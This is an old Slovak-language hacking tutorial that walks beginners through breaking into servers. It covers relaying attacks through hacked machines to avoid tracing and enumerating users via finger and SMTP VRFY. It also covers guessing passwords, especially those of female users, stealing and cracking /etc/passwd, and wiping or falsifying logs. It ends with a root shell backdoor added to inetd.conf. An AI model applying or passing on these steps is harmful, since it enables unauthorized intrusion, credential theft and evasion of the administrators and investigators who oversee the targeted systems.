Svoju totoznost mozme zakryt programikom s nazvom redirektor... Najprv sa  pozrime ako redirektor funguje. Dajme tomu ze sme hacli niejaky zabudnuty  skolsky server. Na ten server si umiestnime redirektor. Po spusteni redirektoru  sa napoji na niejaky port a bude pocuvat. Ak sa niekto napoji na tento port ,  redirektor sa napoji na cielovy pocitac a vsetke pakety ktore prijme odosle na  druhu stranu A tak sa cielovemu pocitacu javime ako keby sme utocili z pocitaca  na ktorym je redirektor umiestneny a nie na tym z ktoreho pocitaca naozaj  utocime.
Ak hacker ma dostatok hacknutych masin moze si z redirektorov  urobit celu siet a je prakticky nevystopovatelny... Pakety sa budu presuvat od  jedneho pocitaca cez druhy az na cielovy pocitac ... a to uz vazne maju co robit  aby vas vystopovali :)
Nieje to iba tato vec ktora sa da vyuzit pomocou redirektora.... Dajme tomu  ze niekto ma pristup do ineho systemu na zaklade kontroly IP adresy napr news  server ktory pracuje pre urcitu domenu ... nato aby sme sa dostali na tento  system nam posluzi redirektor.
Redirektor sa nevyuziva len na kale ucely ale mozme ho vyuzit aj pre svoj  prospech
Uvedieme maly priklad ... Dajme tomu ze v skole mame pristup na  internet ale firewall nam zakaze vsetke spojenia ktore idu na port 6667 (Sluzba  IRC) cize nemozeme pouzivat IRC. Takze si hodime redirektor na niejaku inu  masinku mimo nasej skoly a nastavime ho nasledujuco:
redirektor 5858  irc.napri.sk 6667
Teraz vam staci nastavit IRC klienta na masinku kde je  umiesteny redirektor a nastavte ho na port 5858 . Redirektor vsetke pakety  presmeruje na server irc.napri.sk na port 6667 kde bezi sluzba iRC (irc demon)  ... Tak sme sa vyhli zakazu nepouzivania IRC a kludne si mozme pokecat hoci nam  to zakazali (o:
Redirektor je pekna vecicka a tiez sa na inete da stiahnut kde by ste ani  nechcely :) jeden si stiahnite a vyskusajte si presmerovat pakety ... (o: alebo  este lepsie naprogramujte ;-)
Ziskavanie Informacii
Ak si vyhladneme niejaku masinku do ktorej sa  chceme naburat ako prve musime o nej ziskat cim viac informacii :) Ako prve sa  pozrieme ake sluzby na serveri bezia. (cize oscanujee masinu) Potom sa pokusime  zistit verzie jednotlivych sluzieb (pod akym programom a ktora verzia) Asi  netreba pisat preco ??? ak vieme aka presna verzia programu bezi mozme sa  pokusit vyhladat na internete exploit a pomocou neho preniknut dnu. Ak exploit  na danu sluzbu neexituje tak mozme si stiahnut zdrojak a mozme zacat ho studovat  a niejaku chybycku najst :)
Tak isto sa pokusime zistit presnu verziu OS  jednotlive distribucie obsahuju defaultne ucty , ktore sa vytvoria po  nainstalovani a spravca ich zabudol opravit bud zmenit hesla atd... Pomocou  tychto defaultnych uctov sa mozme dostat dnu vacsinou heslo=login ..
Ako ziskat tieto infosky ??? Vacsina sluzba pred logovanim (alebo po) vas  oboznamia s nazvom programu a verziou... vyberte si niejaky server a skuste sa  nanho klasicky telnut (port 23 ak na serveri ta sluzba bezi) cize zadame
telnet www.server.sk 23
a mozte uvidiet nieco taketo :
RED  HAT LINUX release 6.2 (zoot) Kernel 2.2.14-601 on an i686 login:
Ako  vidite server vam povedal aky system pouziva :) su to velmi cenne infosky ...
Podobne sa mozme pozriet na dalsie sluzby napr na FTP ... cize sa klasicky  telnetneme na ftp
telnet www.server.sk 21
vystup:
220  www.server.sk FTP server (version wv -2.6.0(1) mon feb 28 10:30:36 EST 2000)  ready
A zas sme dostali co sme chceli verziu FTP ... A Mozme ist dalej  napr. smtp
telnet www.server.sk 25
Vystup:
220  www.server.sk ESMTP Sendmail 8.9.3/8.9.3; Thu 24 may 2001 17:32:04 -0400
Vidime aky program sa stara o postu a aj presnu verziu cize sendmail  8.9.3/8.9.3
A takto mozme pozbierat vsetke infosky z servera... su to velmi cenne  ifnormacie .. !!! Po zisteni tychto informaciu uz staci len vyhladat exploity a  vediet ich pouzit :))) Vacsina server tieto infosky vam poskytuje. Vacsinou sa  spravcovi nechce ich specifikovat alebo dokonca zasahovat az do zdrojoveho kodu  aby tomu zabranil :)
Dalsie informacie ktore sa nam mozu zist su informacie o menach uctov,  domacich adresarov, aktivnych uzivatelov a pod... Nato je urcena sluzba finger  bezi na porte 79 ,,, ak je tato sluzba pristupna tak v linuxe mozme pouzit  prikaz finger ... napr. ak si chceme zistit ci je niekto prave prihlaseny tak  zadame
finger @www.server.sk
server nemusi hned vyklopit vsetkych prihlasenych uzivatelov ! miesto toho sa  vam zobrazi hlaska Must provide username ... to znamena ze musime zadat niejake  meno , nemusi to byt spravny login ale staci hocijake meno ak uzivatel stakymto  menom existuje vypise sa jeho login plus dalse infosky o nim ... cize si zvolme  napr. katka
finger katka@www.server.sk
ak takyto uzivatel existuje  vypisu sa infosky inak sa vypise hlaska no such user podobnym sposobom si mozme  zistit informacie o uzivatelovy root ako jeho meno, jeho adresar, aky ma shell a  pod..
finger root@www.server.sk
Tak mozme skusat niejake mena a  ziskavat konta ktore nasledne mozme naburat ... spravcovia sa brania ako mozu :)  a vymisleli tzv. fake finger cize vam poskytuju falosne informacie o uzivatelov  a pod ... (o: ak je na serveri dostatok kont nieje problem niejake heslo uhadnut  ... najme uzivatelkam renata, katka, zuzana atd... :) vyskusajte ako hesla ich  menne zdrobneliny ako napr. renatka, zuzanka a pod .. :) Ako zistime vsetkych  uzivatelov servera ??? (loginy)
ak je to niejaky skolsky server tak sa  pozrite na ich stranky vacsinou skoro kazdy ziak ma svoj email a vacsinou su  zverejnene na strankach (o: vyskusajte sa pozriet na stranocky a urcite niejake  konta najdete .... nie vsak vsetke ! :) Ak chcete zistit vsetke konta mozte to  skusit fingerom pozriete sa aky ma adresar nastaveni root a hodime na to finger  napr ak ma /bin/bash zadame finger /bin/bash@www.server.sk je to uz velmi stara  finticka a uz skoro vobec nepouzitelna ale skusit mozete mozno vam to pekne  vyklopi vsetke ucty :) Ale vazne funguje len malo kedy musime skusat aspon  krstne mena .. napr... janka, katka atd.. (finger janka@www.server.sk)
Ale co ak finger nieje vobec pristupny ??? ak sluzba finger nieje vobec  pristupna mozme hadat loginy pomocou protokolu SMTP kto si uz nastudoval  protokol SMTP vie uz o co ide :) kto nevie nech ajtak prestuduje hoci teraz to  napisem ... Pomocou prikazu VRFY mozeme zistit ci dane konto existuje ...  jednoducho sa telnetneme na port 25 a ak budeme chciet zistit ci existuje konto  qwertz zadame :
vrfy qwertz ak sa vypise 550 qwertz. User  unknown dane koto neexistuje a mozme skusat dalej ale ak sa vypise podobne  tomuto:
250 qwertz angel <qwertz@server.sk>
dane konto  existuje a mozme zacat hadat hesla :) o zistovany uzivatelov a fingerovani uz by  aj stacilo .. prestudujte si manualovu stranku fingera (man finger)
Socialne inzinierstvo
a ako posledny druh ziskavania informacii o  serveri je socialne inziniesrstvo. Pomocou socialneho inzinierstva mozte dokonca  ziskat aj heslo :) o co vlastne ide ? vydavate sa za niekoho ineho a snazite sa  ziskat informacie .... osobne ja stym nemam ziadne skusenosti lebo nikdy som to  nepouzival ... ale vravi sa ze je to skveli sposob ako ziskat infosky o serveri  ... napr.. sa budete zadavat za niejaku holku na ircecku kde je spravca  niejakeho servera .. a date sa snim do reci ... a uz zalezi od IQ spravcu a  vasej sikovnosti kolko z neho vytiahnete .. :) Vacsinou to vraj funguje iba raz  lebo samozrejme druhykrat sa spravca neda nachytat ak zisti ze vdaka jeho  najivnosti mu hackli server ... Zavisi vazne iba od vasej sikovnosti ... ale ja  osobne si myslim ze je to totalna blbost :)) ... ale spomenul som to aby ste  vedeli ze existuje aj nieco taketo ... (o:
Naburavanie ???
Ak mame dostatok informacii o serveri mozme sa pokusit  sa donho preniknut... asi najlahsou cestou je pouzit niejaky exploit :) ale  teraz sa pozrime na trosku zlozitejsi pripad ako preniknut do systemu :) V prvom  rade sa musime dostat dnu cez hociakeho normalneho uzivatela ... vyberieme si  niejake konto a pustime sa do lamania hesla ... Ak na serveri je vela uzivatelov  nieje problem niejake zlomit ... najlepsie je skusat hesla na uzivatelov nezneho  pohlavia :) vacsinou si volia velmi lahke hesla napr.. svoje meno, priezvysko ,  alebo niejaku tu zdrobnelinku ... napr...
renata , renatka, RENATA atd ...  (nezabudnite ze sa rozlisuju male a velke pismena cize RENATA nieje to iste ako  Renata alebo ReNata ale to urcite viete :) Tiez sa mozes sustredit na sluzobne  konta ako www, webmaster, admin, webadmin , spravca atd ... (samozrejme si  najprv zisti ci taketo konta vobec existuju :) hadat hesla mozeme cez telnet ,  ftp (pozri Lamanie hesiel vyssie:)
Ak sa nam podari prelomit heslo tak sa pekne cez tento login prihlasime  telnetom (port 23 :)
ako prve si musime stiahnut subor passwd ktory sa  nachadza zvicajne v adresari /etc
tento suborik obsahuje vsetkych uzivatelov  a mozno aj zakryptovane hesla. :)
(tiez si ho mozme poslat na email uz  urcite viete s linuxom posielat emaili , prenasat subori a pod.. ak nie ... tak  sa ucte... jednoducho subor passwd musite dostat na svoj kompik:)
Subor passwd ...
ak ste ziskali passwd subor tak si ho prezride mozte  tam vidiet nieco podobne tomuto :
--------------------------------------------------------------------------
root:mlslNX69rMTMp:0:0:System PRIVILEGED account:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
gdm:x:42:42::/home/gdm:/bin/bash
piranha:x:60:60::/home/httpd/html/piranha:/dev/null
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
pvm:x:24:24::/usr/share/pvm3:/bin/bash
lamers:K6Uln9aNpluKk.:505:200:Technicky Servis,,,,:/home/technik:/bin/bash
horvat:K4lJNXC9rUTMk:509:701:Ivan Horvat:/home/horvat:/bin/tcsh
----------------------------------------------------------------------------
vyberieme si stoho jeden riadok a podrobne si ho vysvetlime:
qwertz:mlslNX69rMTMp:100:500:Qwertz  Angel:/home/qwertz:/bin/bash

qwertz: - Login (stym sa prihlasujeme do  systemu)
mlslNX69rMTMp: - Toto je zakryptovane heslo tzv irreversibilny  algoritmus cize neexistuje sposob ako ho odsifrovat
100: - UserID .. ID je  cislo, ktore linux pouziva k indentifikacii uctu uzivatela.
500 -GroupID -  cislo skupinu pod ktoru uzivatel patri
Qwertz Angel - Plne meno  uzivatela
/home/qwertz: -domovsky adresar
/bin/bash -Shell ktory pouziva
Takze heslo je zasifrovane 13 miestnym algoritmom. Ako sa da odsifrovat ???  nieje sposob ako sa da odsifrovat lebo je to irreversibilny algoritmus co  znamena ze je kodovany nevratne ...
pozrime sa co sa deje ak sa prihlasujeme  na masinku... zadame login a heslo ... heslo sa zakoduje tym istym algoritmom a  porovna sa v passwd subore .. ak sa retazce zhoduju znamena ze heslo je spravne  ak sa nezhoduju heslo je nespravne .... cize ak chceme z passwd suboru zistit  heslo musime pouzit pokusy a omyli .. :) cize si musime zohnat program ktory  skusa hesla z slovnika alebo sposobom brute atak ale pred tym ho zasifruje a  porovna ho s retazcom v passwd ak sa zhoduju heslo je spravne :) ak nie  pokracuje dalej ... Na taketo lamanie hesiel existuje zas kopu softu a je  samozrejme lahko dostupny aj na inetrnete :)))
Ak miesto zakryptovaneho hesla uvidite znak "x"alebo "*" alebo podobny zalezi  od typu unixu tak je heslo zatienene (shadowed)V tomto pripade je zakryptovane  heslo ulozene v celkom inom subore do ktoreho ma pristup iba root a jadro  systemu ... v tomto pripade z neho hesla nevitiahneme :) ale aspon mame  informacie o userov... tolko o subore passwd ....
Logy a mazanie sa z logov.
Vsetke vase aktivity sa zaznamenavaju do  logov. Spravu systemovych logov zabezpecuje syslogd (syslog demon). Skuste sa  pozriet do suborov /var/log/syslog a /var/log/messages uvidite tam vsetke vase  aktivity kedy ste sa logovali, co ste robili vsetko vsetko vsetulinko. :) Zalezi  aj od roota co chce logovat a najma kam sa maju zapisovat vsetke nase cinnosti.
Ako je to s mazanim stop? Ako prvu vec sa treba popozerat po /etc adresari a  prestudovat vsetke dolezite konfiguracne subory aby sme si urobili predstavu o  serveriku a najma aby ste zistili kde sa loguje. Administrator kludne moze  zmenit adresar kde sa ukladaju logy. A vy mozte mazat logy z defaultnych  adresarov ked ajtak tam nic nieje :) Najlaksim sposobom ako zmazat stopy po  nasich aktivitach je samozrejme otvorit textovy log v niejakom editore a zmazat  v nom riadky po nasej nekalej cinnosti... Existuju aj vselijake skriptiky ktore  to urobia za vas ... ale samozrejme je vhodne aspon skontrolovat ci sa vymazalo  co malo :)
Ak ste editli textovy log a vsetke svoje aktivity vymazali  neznamena to uspesne zamaskovanie. Administrator moze logovat na niejaku inu  masinku :) Potom vam ostava hacknut aj tuto druhu :) ale tiez moze nastavit aby  logovalo priamo na tlaciaren noa to ste uz v keli preto treba stale pouzivat  redirektori :)
Okrem textovych logov existuju tiez binarne logy (lastlog, wtmp, utmp) Tieto  subory su binnarne cize ich nemozeme editovat. Pozrite si ich manualove stranky  (man wtmp , man lastlog, man utmp). Na cistenie z tychto logov existuje spusta  malich programikov vacsinou nazyvane cistice. Subor lastlog je ulozeny vacsinou  v adresari /var/log/lastlog v nom najdete zaznamy o poslednom pripojeni kazdeho  uzivatela. Subor wtmp je ulozeny vacsinou v adresari /var/log/wtmp v nom najdete  informacie skade a ako dlho kto bol pripojeny. Subor utmp je vacsinou ulozeny v  adresari /var/run/utmp obsahuje informacie o momentalne prihlasenych uzivatelov.  Tiez existuju logy do ktorych sa zapisuju vsetke prikazy napisane v shelli.  Najlepsie bude ak si precitate manualove stranky (man bash alebo man tcsh)  Existuju aj dalsie subory kde sa loguje ale postupnym spoznavanim linuxu urcite  nato pridete :)
Este lepsie ako sa vymazat z logov je ich strosilinku  opravit a tak priviest administratora na falosnu stopu :) ale to uz zalezi od  vas ... O logovani , logov by to bolo aj vsetko dalo by sa toho napisat ovela  viac ale ako bolo povedane postupnym spoznavanim linuxu sa vsetko naucite :)
Backdoor - zadne vratka
Dajme tomu ze sme hackli konto roota na  niejakom serveri ale co ked root na to pride, zmeni si heslo a zaplata system  ??? uz potom by nam neostavalo nic ine ako hladat dalsie chybycky na serveri :)  aby sme tomu zabranili musime si nainstalovat niejaky backdoor. Backdoor je  niejaka bezpecnostna diera sluziaca k pristupu do systemu bez vedomia  administratora (roota). Existuju mnozstvo roznych backdoorov. Ako backdoor moze  byt niejaky prerobeny systemovy program , alebo len pridanych par riadkov kodu  do /bin/login. Na internete najdete rozne backdoory ktore su volne stiahnutelne  :) Pre priklad sa pozrieme na jeden maly konfiguracny backdoor ...
Do suboru /etc/inetd.conf pridame tento jednoduchy riadok
2828   stream   tcp    nowait    root    /usr/sbin/tcpd    /bin/bash -i
ak root si zmeni heslo staci sa nam telnetnut na port 2828 a spusti sa nam  shell (o: Nebudem vobec vysvetlovat co sme teraz urobili uz trosilinku pokrocili  linuxaci vedia naco sluzi konfiguracny subor inetd.conf a co znamena cely vyssie  napisany riadok !!! Ak nie tak znamena ze ste z linuxu duty a sup sup zohnat  textiky a ucit sa... saq to nieje prirucka o linuxe ale o hackovani ;-) .... to  bol iba jeden velmi malicky priklad zadnych vratok.. existuju ovela zlozitejsie  backdoory !!! ale tato prirucka je len pre zacinajucich hackerov (o: O  backdoorov by to bolo zatial vsetko ....
Zaver
A je tu zaver .... dufam ze vam tota prirucka pomohla :) Urcite  po precitani tejto prirucky sa nestanete hackermi ... nato vam tato prirucka  nepomoze .. neostava vam nic ine iba ucit sa ucit sa a ucit sa :) Sledujte  vsetke stranky ktore sa venuju bezpecnosti, linuxe ... vlastne citajte vsetko  vsetulinko co vam pride pod ruky a co vas zaujima ... :)
UPOZORNENIE: Tuto prirucku napisal qwertz mozes ju sirit, kopirovat,hodit si  ju na svoju page len nesmies menit obsah ! a pytat za nu peniazky !!! POTOM JE  TO TRESTNE A NEBEZPECNE!